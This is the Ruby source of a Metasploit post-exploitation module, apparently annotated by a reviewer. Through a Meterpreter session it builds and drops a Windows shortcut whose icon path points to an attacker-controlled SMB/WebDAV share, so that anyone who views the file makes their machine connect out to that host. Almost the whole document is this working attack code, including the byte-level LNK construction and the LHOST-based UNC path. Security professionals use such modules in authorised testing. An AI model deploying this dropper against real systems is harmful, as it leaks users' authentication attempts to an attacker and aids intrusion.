##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
  # Post module that writes a hand-assembled Windows shortcut (.lnk) through
  # the Meterpreter file API. The shortcut's ICON LOCATION string is a UNC path
  # built from LHOST, SHARENAME and ICONFILENAME; per the module description,
  # rendering the shortcut makes the viewing user's host open SMB/WebDAV
  # connections to that path.
  #
  # Artifacts visible from the code: the file LNKFILENAME (reported in #run as
  # written under session.fs.dir.pwd) and an outbound connection attempt to
  # \\LHOST\SHARENAME\ICONFILENAME from any host that displays the shortcut.

  # Registers module metadata and the datastore options that #run reads:
  # LHOST, SHARENAME and ICONFILENAME are interpolated into the icon path,
  # LNKFILENAME is the name of the file written on the target.
  #
  # @param info [Hash] module info, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Escalate SMB Icon LNK Dropper',
        'Description' => %q{
          This module drops a shortcut (LNK file) that has a ICON reference
          existing on the specified remote host, causing SMB and WebDAV
          connections to be initiated from any user that views the shortcut.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'mubix' ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            # Channel commands are what client.fs.file.new/write/close need;
            # stdapi_fs_getwd backs the session.fs.dir.pwd call in #run.
            'Commands' => %w[
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
              stdapi_fs_getwd
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK],
          'Reliability' => []
        }
      )
    )
    register_options(
      [
        OptAddress.new('LHOST', [ true, 'Host listening for incoming SMB/WebDAV traffic', nil]),
        OptString.new('LNKFILENAME', [ true, "Shortcut's filename", 'Words.lnk']),
        OptString.new('SHARENAME', [ true, 'Share name on LHOST', 'share1']),
        OptString.new('ICONFILENAME', [ true, "File name on LHOST's share", 'icon.png'])
      ]
    )
  end

  # Assembles the LNK byte stream in memory, then writes it to LNKFILENAME on
  # the session host.
  #
  # Everything except the ICON LOCATION string is a fixed literal describing a
  # shortcut to C:\AUTOEXEC.BAT (see the LinkInfo, RELATIVE_PATH and
  # WORKING_DIR sections below). The two-byte prefixes ahead of each string
  # (0x0e before RELATIVE_PATH, 0x03 before WORKING_DIR, 0x1c before the icon
  # path) are hard-coded; the first two match the literal strings that follow,
  # while the icon path varies with the datastore. NOTE(review): confirm the
  # 0x1c prefix against the interpolated icon path length for the inputs in
  # use — it is not recomputed here.
  #
  # @return [void]
  def run
    print_status 'Creating evil LNK'
    lnk = ''
    # --- ShellLinkHeader ---
    lnk << "\x4c\x00\x00\x00" # Header size
    lnk << "\x01\x14\x02\x00\x00\x00\x00\x00" # Link CLSID
    lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46" # Link CLSID (remaining 8 bytes)
    lnk << "\xdb\x00\x00\x00" # Link flags
    lnk << "\x20\x00\x00\x00" # File attributes
    # The three timestamps are the same fixed value.
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Creation time
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Access time
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Write time
    lnk << "\x00\x00\x00\x00" # File size
    lnk << "\x00\x00\x00\x00" # Icon index
    lnk << "\x01\x00\x00\x00" # Show command
    lnk << "\x00\x00" # Hotkey
    lnk << "\x00\x00" # Reserved
    lnk << "\x00\x00\x00\x00" # Reserved
    lnk << "\x00\x00\x00\x00" # Reserved
    lnk << "\x7b\x00" # IDListSize (hard-coded 0x007b; not derived from the bytes below)
    # sIDList — item ID list for C:\AUTOEXEC.BAT, fixed literal
    lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"
    lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"
    lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"
    lnk << 'C:\\'
    lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"
    lnk << "\x00"
    lnk << 'AUTOEXEC.BAT'
    lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"
    lnk << "\x5b\x15\x14\x00\x00\x00"
    lnk << Rex::Text.to_unicode('AUTOEXEC.BAT') # same name again, UTF-16LE
    lnk << "\x00\x00\x1c\x00\x00\x00"
    # sLinkInfo — local path C:\AUTOEXEC.BAT, fixed literal
    lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"
    lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"
    lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"
    lnk << "\x00\x00\x00"
    lnk << 'C:\\AUTOEXEC.BAT'
    lnk << "\x00\x00\x0e\x00" # trailing NUL, then 0x000e = character count of the RELATIVE_PATH below
    # RELATIVE_PATH
    lnk << Rex::Text.to_unicode('.\\AUTOEXEC.BAT')
    lnk << "\x03\x00" # 0x0003 = character count of the WORKING_DIR below
    # WORKING_DIR
    lnk << Rex::Text.to_unicode('C:\\')
    # ICON LOCATION — the only datastore-dependent field in the file
    lnk << "\x1c\x00" # 0x001c, hard-coded; see the NOTE(review) in the method comment
    # NOTE(review): the trailing backtick inside this path is in the original
    # source; whether it is intentional cannot be told from here.
    lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\#{datastore['SHARENAME']}\\#{datastore['ICONFILENAME']}`")
    # Trailing extra-data blocks, fixed literal
    lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"
    lnk << 'computer'
    lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"

    # LNKFILENAME is passed as a relative name; the status line reports it as
    # landing in the session's current directory.
    print_status "Done. Writing to disk - #{session.fs.dir.pwd}\\#{datastore['LNKFILENAME']}"
    file = client.fs.file.new(datastore['LNKFILENAME'], 'wb')
    # NOTE(review): close is not wrapped in ensure, so a write failure leaves
    # the remote channel open — confirm whether client.fs.file has a block form.
    file.write(lnk)
    file.close
    print_status 'Done. Wait for evil to happen..'
  end
end